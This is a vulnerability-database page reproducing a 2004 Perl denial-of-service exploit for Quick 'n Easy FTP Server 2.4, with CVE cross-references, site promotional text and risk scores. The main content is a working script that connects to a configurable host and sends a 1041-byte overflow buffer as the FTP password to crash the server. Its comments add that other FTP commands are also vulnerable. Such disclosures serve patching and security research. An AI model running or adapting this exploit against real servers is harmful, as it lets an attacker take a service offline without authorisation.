Lucene search
+L

Quick 'n EasY 2.4 FTP Server - Remote Denial of Service

🗓️ 24 Oct 2004 00:00:00Reported by KaGraType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Remote Denial of Service exploit for Quick 'n Easy FTP Server version 2.4 causes server crash.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-2027
26 Apr 200600:00
cve
cvelist
Cvelist
CVE-2006-2027
26 Apr 200600:00
cvelist
euvd
EUVD
EUVD-2006-2028
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-2027
26 Apr 200600:06
nvd
prion
Prion
Buffer overflow
26 Apr 200600:06
prion
#!/usr/local/bin/perl -w

###########################################################
###########################################################
##   Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes
## will crash the sever,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
############################################################
############################################################


use Net::FTP;


$hostname = 'localhost'; 		#Remote Host to D.o.S!
$username = 'anonymous'; 		#AnythinG HeRe!

print "\n[*]BuiLDinG BuFfer...\n";

$password = 'A'x1041   ; 		#OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";

$ftp = Net::FTP->new($hostname);        # Connecting...
print "[*]SenDing DeViL...\n\n";

$ftp->login($username, $password);      # Send EviL BuffeR...

$ftp->quit;
print "SerVer Has Been Dosed,will be Down if  LogFile is or will be viewed!\n";


# milw0rm.com [2004-10-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Oct 2004 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.5
EPSS0.03891
48